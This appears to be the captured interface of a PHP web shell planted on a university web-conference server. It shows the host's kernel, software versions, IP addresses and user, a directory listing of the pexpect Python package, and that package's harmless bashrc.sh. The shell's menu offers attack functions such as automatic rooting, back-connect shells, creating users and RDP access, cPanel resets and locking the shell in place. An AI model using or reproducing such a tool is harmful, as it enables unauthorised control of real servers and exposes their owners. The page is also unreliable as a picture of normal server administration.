Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.15.188.75
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
pexpect /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
ANSI.py
11.89
KB
-rw-r--r--
FSM.py
13.1
KB
-rw-r--r--
__init__.py
3.81
KB
-rw-r--r--
_async.py
2.62
KB
-rw-r--r--
bashrc.sh
380
B
-rw-r--r--
exceptions.py
1.04
KB
-rw-r--r--
expect.py
10.78
KB
-rw-r--r--
fdpexpect.py
5.69
KB
-rw-r--r--
popen_spawn.py
6.02
KB
-rw-r--r--
pty_spawn.py
35.01
KB
-rw-r--r--
pxssh.py
22.06
KB
-rw-r--r--
replwrap.py
5.05
KB
-rw-r--r--
run.py
6.48
KB
-rw-r--r--
screen.py
13.39
KB
-rw-r--r--
spawnbase.py
20.57
KB
-rw-r--r--
utils.py
5.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bashrc.sh
# Different platforms have different names for the systemwide bashrc if [[ -f /etc/bashrc ]]; then source /etc/bashrc fi if [[ -f /etc/bash.bashrc ]]; then source /etc/bash.bashrc fi if [[ -f ~/.bashrc ]]; then source ~/.bashrc fi # Reset PS1 so pexpect can find it PS1="$" # Unset PROMPT_COMMAND, so that it can't change PS1 to something unexpected. unset PROMPT_COMMAND
Close